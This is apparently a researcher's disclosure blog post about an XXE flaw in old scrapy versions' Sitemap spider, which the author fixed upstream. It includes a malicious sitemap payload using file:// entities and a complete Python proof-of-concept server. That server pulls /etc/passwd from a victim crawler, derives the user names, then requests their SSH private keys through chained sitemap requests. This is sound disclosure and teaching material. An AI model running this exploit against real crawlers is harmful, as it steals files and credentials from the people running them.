SPECT Research

Security and Software Development

Exploiting the scraper

As some of you have noticed, I have posted less often in recent years. For more than two years I've been happily working full-time at Scrapinghub, the company behind the popular scrapy framework, mostly on software projects unrelated to security, so I can only dedicate my spare time to it.

scrapy is a powerful web scraping framework, and it usually doesn't involve anything server-side unless you use the scrapyd project to manage your scrapy spiders. Even so, I was a bit worried about the security of this tool because I use it daily and any vulnerability would affect me on the client side.

Well, scrapy uses lxml under the hood for HTML/XML processing, and with XML External Entity (XXE) attacks around, I wanted to test whether scrapy was vulnerable to them in some way. It was, as I described in this pull request, and in this post I'll explain an automated way to exploit it.

Finding a vulnerable component

I knew that lxml was used in Selectors and in some kinds of spiders, such as the Sitemap spider. Both components can handle XML files and were vulnerable because they initialized their XMLParser instance this way:

lxml.etree.XMLParser(recover=True, remove_comments=True)

According to the documentation, the resolve_entities argument is True by default, which makes the parser vulnerable to the aforementioned XXE attacks.
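
To make the difference concrete, here is a minimal sketch (not scrapy's actual code) that parses the same document with entity resolution switched on and off. The file name secret.txt, the helpers parse_with and build_document, and the sample contents are made up for illustration. resolve_entities is passed explicitly in both cases because its default may differ between lxml versions.

```python
import os
import pathlib
import tempfile

from lxml import etree

# Hypothetical secret standing in for a sensitive local file.
SECRET = "top-secret-token"


def parse_with(resolve_entities, xml_bytes):
    """Parse xml_bytes and return the serialized root element."""
    parser = etree.XMLParser(recover=True, remove_comments=True,
                             resolve_entities=resolve_entities)
    root = etree.fromstring(xml_bytes, parser=parser)
    return etree.tostring(root).decode("utf-8")


def build_document(path):
    """Build an XML document whose &xxe; entity points at a local file."""
    uri = pathlib.Path(path).as_uri()  # absolute path turned into a file:// URI
    return ('<?xml version="1.0"?>\n'
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "%s">]>\n'
            '<foo>&xxe;</foo>' % uri).encode("utf-8")


with tempfile.TemporaryDirectory() as tmp:
    secret_path = os.path.join(tmp, "secret.txt")
    with open(secret_path, "w") as fh:
        fh.write(SECRET)
    document = build_document(secret_path)
    expanded = parse_with(True, document)    # entity replaced by the file contents
    untouched = parse_with(False, document)  # entity reference is not expanded

print("resolve_entities=True :", expanded)
print("resolve_entities=False:", untouched)
```

With resolution enabled the file contents end up inside the parsed tree, which is exactly what an attacker-supplied document relies on.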

Before I start searching for vulnerabilities, I always think about what a successful exploitation would look like. In this case, Selectors weren't a good spot: I could create a malicious XML file and serve it from a web server, a scrapy spider would parse it and the vulnerability would be triggered, but I had no way to get the data back.

On the other hand, I knew from experience that sitemaps sometimes contain nested sitemaps and that these are always requested, so I could keep a flow going between a server I control and the victim scrapy spider. That's the path I chose to exploit this vulnerability.

A bit more about sitemaps and Sitemap spider

Sitemaps are files that sites use to index their content, so that crawlers don't have to crawl the whole site to reach every item. They usually contain URL sets, but they can also contain more sitemaps. The Sitemap spider requests the URLs in a normal URL set and passes each response to a callback, so we can't get the data of a successful attack back from that. But we can nest XML sitemaps and generate dynamic responses that always contain another sitemap, which keeps the flow with the victim spider going.
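
The distinction matters because only one of the two document types leads to another sitemap request. Here is a minimal sketch of how a crawler might tell them apart, using only the Python 3 standard library. This is not scrapy's implementation; next_sitemaps and the example.com URLs are illustrative.

```python
import xml.etree.ElementTree as ET

SITEMAP_NS = "{http://www.sitemaps.org/schemas/sitemap/0.9}"

# A regular sitemap: a list of page URLs.
URLSET = """<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>http://example.com/page-1</loc></url>
</urlset>"""

# A sitemap index: a list of further sitemaps to fetch.
SITEMAP_INDEX = """<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <sitemap><loc>http://example.com/sitemap-2.xml</loc></sitemap>
</sitemapindex>"""


def next_sitemaps(xml_text):
    """Return the nested sitemap URLs a crawler would fetch next."""
    root = ET.fromstring(xml_text)
    if root.tag != SITEMAP_NS + "sitemapindex":
        return []  # a urlset lists pages, not further sitemaps
    return [loc.text.strip() for loc in root.iter(SITEMAP_NS + "loc") if loc.text]


print(next_sitemaps(URLSET))         # []
print(next_sitemaps(SITEMAP_INDEX))  # ['http://example.com/sitemap-2.xml']
```

Whoever controls the loc values of a sitemap index decides what the crawler requests next, and that is the channel the attack uses.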

Exploiting the vulnerability in an automated way

To exploit this vulnerability we need a victim using the Sitemap spider. An example of this would be this simple spider:

from scrapy.contrib.spiders import SitemapSpider

class TestSpider(SitemapSpider):
    name = 'test'
    sitemap_urls = ['http://localhost:5000/sitemap.xml']

    def parse(self, response):
        pass  # the callback body is irrelevant to the attack

On the server side, the steps are:

  • Create a server listening on port 5000 (the port the spider points at in sitemap_urls).
  • Create a malicious XML file as explained below:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file://{file_path}" >
]>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<sitemap>
<loc>http://localhost:5000/&xxe;.xml</loc>
</sitemap>
</sitemapindex>

We can set file_path to any file we want to read and our file contains a nested sitemap with the payload to trigger the vulnerability.

  • As you can see from our malicious file, the next sitemap will be requested, and its path will contain the contents of file_path. Now we have a way to retrieve the data from the victim.
  • Do we want only one file? No. We can answer that last request with our malicious file again and request more files.
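
The round trip described in the steps above can be sketched with the standard library alone. This is an illustration written for Python 3, not part of the PoC. It assumes the spider percent-encodes the expanded entity when it builds the next request, and build_request_path and recover_contents are hypothetical helper names.

```python
import re
from urllib.parse import quote, unquote


def build_request_path(file_contents):
    """Simulate the path the victim requests after &xxe; is expanded.

    The loc template is http://localhost:5000/&xxe;.xml, so the file
    contents end up between the leading slash and the .xml suffix.
    """
    return "/" + quote(file_contents, safe="") + ".xml"


def recover_contents(request_path):
    """Server side: strip the slash and the suffix, then percent-decode."""
    match = re.match(r"/(.*)\.xml$", request_path)
    if match is None:
        return None
    return unquote(match.group(1))


# Made-up file contents standing in for the victim's /etc/passwd.
leaked = ("root:x:0:0:root:/root:/bin/bash\n"
          "alice:x:1000:1000::/home/alice:/bin/bash\n")
path = build_request_path(leaked)
print(path)
print(recover_contents(path) == leaked)
```

Newlines travel as %0A in the request path, so the attacker's server has to decode the path before it can read the file line by line.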

Things get interesting when the first response carries a payload to read /etc/passwd: you receive the contents, rebuild the list of real users (not system users), and in the next response you can ask for /home/%user/.ssh/id_rsa. Bingo!
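
One way to separate real users from system accounts is to look at the UID field rather than at the account name. The sketch below takes that route, which differs from the PoC's hard-coded list of system users. The UID range of 1000 to 60000 is an assumption that matches common Linux defaults (distributions are free to choose otherwise), and real_users and the sample data are illustrative.

```python
# Made-up sample in /etc/passwd format.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
"""


def real_users(passwd_text, min_uid=1000, max_uid=60000):
    """Return account names whose UID falls in the regular-user range."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        name, uid = fields[0], fields[2]
        if uid.isdigit() and min_uid <= int(uid) <= max_uid:
            users.append(name)
    return users


# Build the next files to request, one per real user.
targets = ["/home/%s/.ssh/id_rsa" % user for user in real_users(SAMPLE_PASSWD)]
print(targets)  # ['/home/alice/.ssh/id_rsa']
```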

Two things to consider, both fully implemented in the PoC: the sitemap loc needs to end in .xml, and frameworks like Bottle or Flask couldn't handle the weird requests containing the contents of /etc/passwd, so I had to use the built-in HTTP server.

The malicious server code is pasted below. It's just a PoC.

import re
import sys
import time
import BaseHTTPServer

from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote

sitemap_document = """<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file://{file_path}" >
]>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<sitemap>
{content}
</sitemap>
</sitemapindex>
"""

class WebServerHandler(SimpleHTTPRequestHandler):
    users = []

    def get_sitemap(self, file_path):
        """ .xml at the end makes it a valid XML file """
        loc = "<loc>http://localhost:5000/&xxe;.xml</loc>"
        return sitemap_document.format(file_path=file_path, content=loc)

    def parse_users(self, path):
        users = set([u for u in re.findall('/|0A([^:]+):x:', path) if u])
        system_users = set([
            'daemon', 'bin', 'sys', 'sync', 'games', 'man', 'lp', 'mail', 'news', 'uucp',
            'proxy', 'www-data', 'backup', 'list', 'irc', 'gnats', 'nobody', 'libuuid',
            'syslog', 'messagebus', 'usbmux', 'dnsmasq', 'avahi-autoipd', 'kernoops',
            'rtkit', 'whoopsie', 'speech-dispatcher', 'avahi', 'lightdm', 'pulse',
            'hplip', 'colord', 'saned', 'gdm', 'debian-spamd', 'sshd', 'statd', 'puppet',
            'landscape', 'pollinate'
        ])

        self.users = list(users - system_users)
        print('[+] Obtained users: %s' % ', '.join(self.users))

    def request_file(self):
        # The first step is to ask for /etc/passwd
        if not self.users:
            return self.get_sitemap('/etc/passwd')
        else:
            # Use the first user for the PoC
            user = self.users[0]
            return self.get_sitemap(sys.argv[1] % user)

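    def do_GET(self):
        # Every request is answered with an XML sitemap
        self.send_response(200)
        self.send_header('Content-type', 'text/xml')
        self.end_headers()

        # Read the requested URL in search of valuable data
        if 'root:x:0:0' in self.path:
            self.parse_users(self.path)
        elif 'sitemap' not in self.path:
            try:
                content = unquote(re.findall(r'/(.*?)\.xml', self.path)[0])
                print("[+] Possible document: %s" % content)
            except IndexError:
                print("[-] Failed getting file")

        # Request the next file
        content = self.request_file()
        self.wfile.write(content)

    def log_message(self, format, *args):
        # Silence the default per-request logging
        return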

def setup_webserver(server_class=BaseHTTPServer.HTTPServer):
    """ Set up the web server that serves the malicious sitemaps """
    server_address = ('localhost', 5000)
    httpd = server_class(server_address, WebServerHandler)
    try:
        print('To exit, press Ctrl-c')
        httpd.serve_forever()
    except KeyboardInterrupt:
        print('Exiting ..')
        httpd.server_close()

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print('Use: python %s filename_to_get' % sys.argv[0])
        print('filename_to_get format: /home/%s/filename')
        sys.exit(1)
    setup_webserver()


A video showing the exploitation is here. It reads the local file flag.txt from the victim.


The pull request fixing the vulnerability was discussed with the scrapy dev team and merged into master within a few days. It's always good to resolve security issues quickly.

I want to clarify that only versions <= 0.21 were affected by this vulnerability. Even the Ubuntu repositories have many patched versions available. After this, we agreed to open a security mailing list to address this kind of bug, which is a good initiative, and I expect to keep contributing to it.